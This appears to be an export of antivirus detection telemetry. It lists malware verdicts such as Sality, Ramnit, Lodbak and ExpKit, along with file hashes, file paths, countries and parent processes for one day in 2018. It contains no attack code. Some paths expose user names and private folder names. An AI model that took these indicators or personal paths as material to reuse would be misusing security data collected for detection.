  Row(detection=Row(filename='~b18e0b44.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~b18e0b44.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='2dc4a6400d1cf4303a752df45f2adee492d52cd1ce48c572f991187a1c58e2b3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-04T15:46:38Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='~b18e0b44.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~b18e0b44.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='2dc4a6400d1cf4303a752df45f2adee492d52cd1ce48c572f991187a1c58e2b3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-04T15:46:43Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='~b18e0b44.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~b18e0b44.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='2dc4a6400d1cf4303a752df45f2adee492d52cd1ce48c572f991187a1c58e2b3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-04T15:46:38Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='~b18e0b44.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~b18e0b44.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='2dc4a6400d1cf4303a752df45f2adee492d52cd1ce48c572f991187a1c58e2b3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-04T15:46:43Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='~b18e0b44.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~b18e0b44.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='2dc4a6400d1cf4303a752df45f2adee492d52cd1ce48c572f991187a1c58e2b3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-04T15:56:57Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='~b18e0b44.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~b18e0b44.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='2dc4a6400d1cf4303a752df45f2adee492d52cd1ce48c572f991187a1c58e2b3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-04T02:10:28Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='dyne repair utility.exe', filepath='D:\\Dyne1\\DYNECC\\Dyne Repair Utility.exe', filesize=96000, name='TR/Patched.Ren.Gen.#M300.#R3807'), hash='2e26e33a68c31f79c353990911a4d18e9d1626ec0d135aeb1746636bcddad6e4', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='OM', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-04T10:38:03Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='upghost.exe', filepath='E:\\win7\\sources\\upghost.exe', filesize=320000, name='W32/Sality.#M1.#R1'), hash='2e55549986c7ec7696cdbe6bd2565f55d166f0a2dcf0b3c7475b2792411d1fb6', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T12:06:03Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='saveeditor.exe', filepath='g:\\العاب شبكه\\need for speed most wanted on\\SaveEditor.exe', filesize=192000, name='W32/Ramnit.CD.#M1.#R1'), hash='2e5aad637256e5c8af22c9b061b9e1ba12cb71f9fbb709b626d01b17ccc443c4', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T12:55:34Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='saveeditor.exe', filepath='G:\\العاب شبكه\\need for speed most wanted on\\SaveEditor.exe', filesize=192000, name='W32/Ramnit.CD.#M1.#R1'), hash='2e5aad637256e5c8af22c9b061b9e1ba12cb71f9fbb709b626d01b17ccc443c4', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\360\\Total Security\\safemon\\QHActiveDefense.exe', parentsize=965184, timestamp='2018-11-04T11:36:32Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-192909-2c89dc6a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2baa4e4c\\AVSCAN-20181104-192753-1F30712A\\AVSCAN-20181104-192909-2C89DC6A', filesize=256000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='2e7bfe3befe455d77675e4d0f55c650f17e08d841dfadd22f065475ef40c2d5e', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T11:29:09Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='formshomepage.html', filepath='C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsHomePage.html', filesize=256000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='2e7bfe3befe455d77675e4d0f55c650f17e08d841dfadd22f065475ef40c2d5e', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T11:11:28Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='testami.exe', filepath='h:\\oncb-test-linkage\\testami\\bin\\debug\\TESTAMI.exe', filesize=64000, name='HEUR/APC.#M1.#R1'), hash='2e948afd834e3f421959b3731c0683c0feefd44fda9c6a43b8f4acbcb4fb6af5', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T03:04:35Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='lostfile_exe_43149280.exe', filepath='\\\\?\\C:\\Users\\X\\Dropbox\\Formateo de PC\\Escuelas\\Escuela Nueva TP\\Imagen bak up\\E\\Lost Files\\LostFile_EXE_43149280.exe', filesize=64000, name='HEUR/APC.#M1.#R1'), hash='2eaa02316df21c697b12694bdc8122398fa9ee3aa60df8f4b52750dee3aed968', metadata=Row(cmdline=None, country='AR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T23:56:09Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='unins000.exe', filepath='C:\\Program Files\\Aurora3D\\Maker3D\\unins000.exe', filesize=22528000, name='W32/Sality.AT.#M1.#R1'), hash='2eb0e7c909557cd71d15f7f2bbc41058a26d7660b62fc318cbe36b84a761c11c', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T10:13:50Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='unins000.exe', filepath='C:\\Program Files\\Aurora3D\\Maker3D\\unins000.exe', filesize=22528000, name='W32/Sality.AT.#M1.#R1'), hash='2eb0e7c909557cd71d15f7f2bbc41058a26d7660b62fc318cbe36b84a761c11c', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T22:19:57Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='unins000.exe', filepath='C:\\Program Files\\Aurora3D\\Maker3D\\unins000.exe', filesize=22528000, name='W32/Sality.AT.#M1.#R1'), hash='2eb0e7c909557cd71d15f7f2bbc41058a26d7660b62fc318cbe36b84a761c11c', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T22:19:57Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='grid.dll', filepath='\\\\?\\D:\\门窗天使Windoors_Angel\\grid.dll', filesize=1792000, name='HEUR/AGEN.1009828.#M1.#R1'), hash='2f431694853dc5a22013ebb59e0da95db60fa72a2ed05b01a615f60dd53883ce', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T08:40:39Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered nolor', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered nolor', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='2f6ebf21da79db0779ace05500bac9a7b4cc61749d8f935cd23fbfcd87822827', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T21:14:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered nolor', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered nolor', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='2f6ebf21da79db0779ace05500bac9a7b4cc61749d8f935cd23fbfcd87822827', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T01:14:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered nolor', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered nolor', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='2f6ebf21da79db0779ace05500bac9a7b4cc61749d8f935cd23fbfcd87822827', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T03:14:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered nolor', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered nolor', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='2f6ebf21da79db0779ace05500bac9a7b4cc61749d8f935cd23fbfcd87822827', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T11:14:06Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered nolor', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered nolor', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='2f6ebf21da79db0779ace05500bac9a7b4cc61749d8f935cd23fbfcd87822827', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T07:14:06Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered nolor', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered nolor', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='2f6ebf21da79db0779ace05500bac9a7b4cc61749d8f935cd23fbfcd87822827', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T17:14:06Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered nolor', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered nolor', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='2f6ebf21da79db0779ace05500bac9a7b4cc61749d8f935cd23fbfcd87822827', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T09:14:06Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered nolor', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered nolor', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='2f6ebf21da79db0779ace05500bac9a7b4cc61749d8f935cd23fbfcd87822827', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T19:14:10Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered nolor', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered nolor', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='2f6ebf21da79db0779ace05500bac9a7b4cc61749d8f935cd23fbfcd87822827', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T13:14:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered nolor', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered nolor', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='2f6ebf21da79db0779ace05500bac9a7b4cc61749d8f935cd23fbfcd87822827', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T15:14:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered nolor', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered nolor', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='2f6ebf21da79db0779ace05500bac9a7b4cc61749d8f935cd23fbfcd87822827', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T23:14:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered nolor', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered nolor', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='2f6ebf21da79db0779ace05500bac9a7b4cc61749d8f935cd23fbfcd87822827', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T05:14:06Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='obfpmxtbmp.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Roaming\\obfpmxtbmp.exe', filesize=75776000, name='WORM/Lodbak.Gen4.#M300.#R300556'), hash='30f8921b830c23bb51450af865dbeb4f4f62509c857a6cab1482c649953f5134', metadata=Row(cmdline=None, country='AU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T05:06:47Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='obfpmxtbmp.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Roaming\\obfpmxtbmp.exe', filesize=75776000, name='WORM/Lodbak.Gen4.#M300.#R300556'), hash='30f8921b830c23bb51450af865dbeb4f4f62509c857a6cab1482c649953f5134', metadata=Row(cmdline=None, country='AU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T05:07:45Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='obfpmxtbmp.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Roaming\\obfpmxtbmp.exe', filesize=75776000, name='WORM/Lodbak.Gen4.#M300.#R300556'), hash='30f8921b830c23bb51450af865dbeb4f4f62509c857a6cab1482c649953f5134', metadata=Row(cmdline=None, country='AU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T05:07:46Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='obfpmxtbmp.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Roaming\\obfpmxtbmp.exe', filesize=75776000, name='WORM/Lodbak.Gen4.#M300.#R300556'), hash='30f8921b830c23bb51450af865dbeb4f4f62509c857a6cab1482c649953f5134', metadata=Row(cmdline=None, country='AU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T05:07:56Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-180254-e390ec26', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_01911de9\\AVSCAN-20181104-174801-3DA6A564\\AVSCAN-20181104-180254-E390EC26', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='31cf89fc6413a2e5ba20a000e799080b1401607028c82df0d418a6b0c4ded667', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T11:02:54Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-131201-a3689c24', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_91a86a16\\AVSCAN-20181104-131035-977F8FE7\\AVSCAN-20181104-131201-A3689C24', filesize=192000, name='TR/Black.Gen2.#M300.#R100338'), hash='322e3cac81476d70e511183bc106d04cd19941e80d7ac7d97fce4088cacb7a45', metadata=Row(cmdline='\\\\\\/restart \\\\\\/minimized \\\\\\/froma', country='PH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\ByteFence\\ByteFence.exe', parentsize=3709256, timestamp='2018-11-04T16:56:48Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='professional egr remover.exe', filepath='C:\\Program Files\\Professional EGR Remover\\Professional EGR Remover.exe', filesize=8000000, name='TR/Crypt.ZPACK.Gen.#M300.#R8169'), hash='325fcfaae8403873bd8772fa2c68a7e1a4b9ba82601c29b9be4663862cbc8e6d', metadata=Row(cmdline=None, country='UA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T16:45:39Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='professional egr remover.exe', filepath='C:\\Program Files\\Professional EGR Remover\\Professional EGR Remover.exe', filesize=8000000, name='TR/Crypt.ZPACK.Gen.#M300.#R8169'), hash='325fcfaae8403873bd8772fa2c68a7e1a4b9ba82601c29b9be4663862cbc8e6d', metadata=Row(cmdline=None, country='UA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T11:47:33Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='professional egr remover.exe', filepath='C:\\Program Files\\Professional EGR Remover\\Professional EGR Remover.exe', filesize=8000000, name='TR/Crypt.ZPACK.Gen.#M300.#R8169'), hash='325fcfaae8403873bd8772fa2c68a7e1a4b9ba82601c29b9be4663862cbc8e6d', metadata=Row(cmdline=None, country='UA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:21:33Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='professional egr remover.exe', filepath='C:\\Users\\X\\Desktop\\Vimal\\EGR PACKAGE\\egr1.5.5\\crack\\Professional EGR Remover.exe', filesize=8000000, name='TR/Crypt.ZPACK.Gen.#M300.#R8169'), hash='325fcfaae8403873bd8772fa2c68a7e1a4b9ba82601c29b9be4663862cbc8e6d', metadata=Row(cmdline=None, country='TT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T01:11:36Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181103-211229-083d522e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_947ae14e\\AVSCAN-20181103-211151-015901F8\\AVSCAN-20181103-211229-083D522E', filesize=8000000, name='TR/Crypt.XPACK.Gen2.#M1.#R1'), hash='325fcfaae8403873bd8772fa2c68a7e1a4b9ba82601c29b9be4663862cbc8e6d', metadata=Row(cmdline=None, country='TT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T01:12:29Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181103-211213-054170aa', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_947ae14e\\AVSCAN-20181103-211151-015901F8\\AVSCAN-20181103-211213-054170AA', filesize=8000000, name='TR/Crypt.XPACK.Gen2.#M1.#R1'), hash='325fcfaae8403873bd8772fa2c68a7e1a4b9ba82601c29b9be4663862cbc8e6d', metadata=Row(cmdline=None, country='TT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T01:12:15Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='32ac5b4c0cbec7debc03e163bc0cf52f948f65fbfaea82c323aae971b83f56c8', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries31.10.2018-29.available\\Avira\\32AC5B4C0CBEC7DEBC03E163BC0CF52F948F65FBFAEA82C323AAE971B83F56C8', filesize=512000, name='W32/Sality.AT.#M1.#R1'), hash='32ac5b4c0cbec7debc03e163bc0cf52f948f65fbfaea82c323aae971b83f56c8', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-04T08:26:00Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='32ac5b4c0cbec7debc03e163bc0cf52f948f65fbfaea82c323aae971b83f56c8', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries31.10.2018-29.available\\Avira\\32AC5B4C0CBEC7DEBC03E163BC0CF52F948F65FBFAEA82C323AAE971B83F56C8', filesize=512000, name='W32/Sality.AT.#M1.#R1'), hash='32ac5b4c0cbec7debc03e163bc0cf52f948f65fbfaea82c323aae971b83f56c8', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-04T08:23:09Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='a0345238.exe', filepath='\\\\?\\F:\\System Volume Information\\_restore{EC55BFD7-BEFF-42D8-9D76-6078D4869C8B}\\RP438\\A0345238.exe', filesize=512000, name='W32/Sality.AT.#M1.#R1'), hash='32b0d34ab16a2d7df472e6d2dd1895000221fcb97e6d645cbbf34ddae7f28197', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T11:04:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='brmfcmon.exe', filepath='\\\\?\\F:\\Program Files\\Brother\\Brmfcmon\\BrMfcMon.exe', filesize=512000, name='W32/Sality.AT.#M1.#R1'), hash='32b0d34ab16a2d7df472e6d2dd1895000221fcb97e6d645cbbf34ddae7f28197', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T11:34:14Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='a0345238.exe', filepath='F:\\System Volume Information\\_restore{EC55BFD7-BEFF-42D8-9D76-6078D4869C8B}\\RP438\\A0345238.exe', filesize=512000, name='W32/Sality.AT.#M1.#R1'), hash='32b0d34ab16a2d7df472e6d2dd1895000221fcb97e6d645cbbf34ddae7f28197', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVG\\Antivirus\\AVGSvc.exe', parentsize=325072, timestamp='2018-11-04T11:03:18Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='brmfcmon.exe', filepath='F:\\Program Files\\Brother\\Brmfcmon\\BrMfcMon.exe', filesize=512000, name='W32/Sality.AT.#M1.#R1'), hash='32b0d34ab16a2d7df472e6d2dd1895000221fcb97e6d645cbbf34ddae7f28197', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVG\\Antivirus\\AVGSvc.exe', parentsize=325072, timestamp='2018-11-04T11:32:56Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='clickjogos - sisters fashion showdown.exe', filepath='D:\\DOWNLOADS\\DOWNLOADS DO ARES\\DOWNLOADS DO CHROME\\ClickJogos - Sisters Fashion Showdown.exe', filesize=2288000, name='PUA/InstallCore.Gen.#M300.#R8158'), hash='333ab1eb7ede9be06ecb04060300d4ecd2e7468269bffe76561235acd9c27d6c', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2868224, timestamp='2018-11-04T21:12:39Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp000082e5', filepath='C:\\Windows\\Temp\\9f74f793-3e0c-4ccc-958d-ede28943eb23\\tmp0000005e\\tmp000082e5', filesize=12800000, name='TR/Crypt.EPACK.Gen2.#M300.#R100581'), hash='33a6f58abd98ae7f068510b8841c302c679d9ac67b12dc27f184dd22f24e129a', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\adaware\\adaware antivirus\\adaware antivirus\\12.5.961.11619\\AdAwareService.exe', parentsize=587832, timestamp='2018-11-04T09:27:36Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='nqtw5 - xii -kttn (a hòa).exe', filepath='G:\\HOC TW6 (KHOA II)\\NQTW5 - XII -KTTN (A Hòa).exe', filesize=1856000, name='TR/ATRAPS.Gen4.#M300.#R300784'), hash='33d3a8cf907e8b59be97801103c7c6a8fd5fa66ef179ef03cf31d6e1a8b44920', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-04T16:06:08Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='ecddeecdabbfaabbfdaebcadebfaaeeffabbccdebffdeeccaeefcaec.ecddeecdabbfaabbfdaebcadebfaaeeffabbccdebffdeeccaeefcaec', filepath='g:\\\xa0\\ecddeecdabbfaabbfdaebcadebfaaeeffabbccdebffdeeccaeefcaec.ecddeecdabbfaabbfdaebcadebfaaeeffabbccdebffdeeccaeefcaec', filesize=7360000, name='WORM/Lodbak.Gen.#M300.#R7758'), hash='33d8a14588f7ed3324bb88bf818c7d26a21e8a7fa9d7efc84555d47565a3707c', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T23:30:32Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-100609-3880749a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c531c545\\AVSCAN-20181104-100056-11B6C975\\AVSCAN-20181104-100609-3880749A', filesize=192000, name='ADWARE/Adware.Gen.#M1.#R1'), hash='344ba62ba269338d2e1f67d88121e7a53a5bb4d6d06958190c128faf044af500', metadata=Row(cmdline=None, country='AR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T13:06:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\SoftwareDistribution\\Download\\833ec6ee1bc11248456e8d9954c14265\\x86_windowssearchengine_31bf3856ad364e35_7.0.7601.23930_none_75d1609092e92648\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='347efc35f5786537fcb429a95231a5c5af570d40c3c48ccbc3e794ba27354dce', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T13:10:03Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='1_4_12_4.html', filepath='C:\\Users\\This\\AppData\\Local\\VirtualStore\\Program Files (x86)\\Adobe\\Photoshop 7.0\\Help\\1_4_12_4.html', filesize=224000, name='VBS/Ramnit.abcd.#M0.#R0'), hash='34d7ae0eb9935da504f719a191b702e7f01b7b7d911c8ac0c3a2a352b3f2b0c9', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T07:51:09Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='winzip20-lan.exe', filepath='C:\\Users\\X\\Downloads\\winzip20-lan.exe', filesize=1544000, name='PUA/InstallCore.Gen.#M300.#R8158'), hash='34deac3a3ff5894de2a513d6e6a9735af258309f5c0d6a3d890c733fa126ea60', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-04T00:43:12Z'), dt=datetime.date(2018, 11, 4)),
